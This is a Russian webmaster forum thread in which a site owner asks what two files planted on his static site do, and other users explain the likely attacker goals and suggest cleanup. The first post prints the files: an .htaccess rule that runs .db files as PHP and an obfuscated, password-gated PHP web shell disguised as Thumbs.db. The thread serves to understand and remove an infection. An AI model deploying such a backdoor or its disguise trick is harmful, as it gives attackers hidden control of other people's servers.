Что ему нужно?

P
На сайте с 12.04.2014
Offline
44
1096

Здравствуйте! Недавно нашел на сервере в одной глубоко вложенной директории два левых файла, вот их содержимое:

1) файл .htaccess

AddType application/x-httpd-php .db

2) файл Thumbs.db

<?php $____=base64_decode('eJwMl2V/2+j2tb/l/8WhmXJT (код сократил) nduuoXI4s3/B4BK2tA=');if(isset($_POST['_']) && isset($_POST['__'])){$_=$_POST['_'];$__=$_POST['__'];}elseif(isset($_COOKIE['_']) && isset($_COOKIE['__'])){$_=$_COOKIE['_'];$__=$_COOKIE['__'];}if(!empty($_) && !empty($__)){$___=$_.md5($__);$________='';$____=@gzuncompress($____);$______=strlen($____);for($_____=0;$_____<=$______;$_____++){$_______=chr((ord($____[$_____])-ord($___[$_____]))%256);$________.=$_______;$___.=$_______;}if($________=@gzuncompress(@base64_decode($________))){setcookie('_',$_);setcookie('__',$__);$________=create_function('','?>'.$________.'<?php die();');$________();}}die('<center style="color:#777;font:normal 11px verdana;background:#000;"><form action="" method="post">login : <input type="text" name="_"/> &nbsp; password : <input type="text" name="__"/> <input type="submit" value="go"/></form></center>');?>

Вопрос: что хочет этот деятель, который залил на сервер эти файлы? Какую цель преследует? Какие последствия могут быть от таких скриптов?

ЗЫ

Ему нужны ключи от админки сайта? А может еще чего? Помогите понять. Спасибо.

eis
На сайте с 18.10.2008
Offline
473
eis
#1
profoto:
Что ему нужно?

1) Доступ к сайту

2) Рассылка спама

- Здесь я покупаю вечные ссылки на свои сайты! (https://backlinkator.com) - сотни ссылок за копейки
P
На сайте с 12.04.2014
Offline
44
#2

eis, то есть он хочет получить ключи от FTP?

yozik13
На сайте с 03.11.2012
Offline
84
#3

файлы часть вируса, твой сервак заражен

YaGu
На сайте с 19.10.2009
Offline
39
#4

Принимайте меры. Я по нензнанке столько денег кому-то подарил в свое время. Будьте внимательны.

P
На сайте с 12.04.2014
Offline
44
#5
yozik13:
файлы часть вируса, твой сервак заражен

Я спрашивал у своего хостера на счет взлома сервера, говорят что у них не было взломов. Сказали что эти файлы мне залили извне не через взломанный сервер а как-то по-другому... остается только догадваться как...

---------- Добавлено 30.09.2014 в 14:54 ----------

YaGu:
Принимайте меры. Я по нензнанке столько денег кому-то подарил в свое время. Будьте внимательны.

Что посоветуете мне предпринять в данном случае? Файлы удалил.

yozik13
На сайте с 03.11.2012
Offline
84
#6
profoto:
Я спрашивал у своего хостера на счет взлома сервера, говорят что у них не было взломов. Сказали что эти файлы мне залили извне не через взломанный сервер а как-то по-другому... остается только догадваться как....

Дык они тут не при чём, ты сам залил.

Чаще всего вирус может быть в левой CMS, у меня так было.

P
На сайте с 12.04.2014
Offline
44
#7

yozik13, на этом сайте ЦМСка не используется, он статический. Правда, есть скрипты комментов и гостевой, видимо там корень зла. Два года скрипты работали и было все норм., а вот сейчас кому-то понадобилось ломать сайт, зачем?

pastuhoff
На сайте с 29.10.2005
Offline
229
#8
profoto:
а вот сейчас кому-то понадобилось ломать сайт, зачем?

Для собственного обогащения, вестимо.

Коллекционер доменных имен.
P
На сайте с 12.04.2014
Offline
44
#9

pastuhoff, это сайт-визитка, там особо обогатиться нечем. Может это конкуренты пытаются убрать мой сайт из топа. Не понимаю...

K5
На сайте с 21.07.2010
Offline
209
#10

ТС не ищите смысл взлома именно вашего сайта, вы - один из многих пострадавших.

Взломщики занимаются этим не из-за "нравится/не нравится сайт", а по принципу - ломаю все что ломается.

Цели любые - дорвеи, спам, промежуточное звено в ботнетах, заработок на рекламе и т.д. и т.п.

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий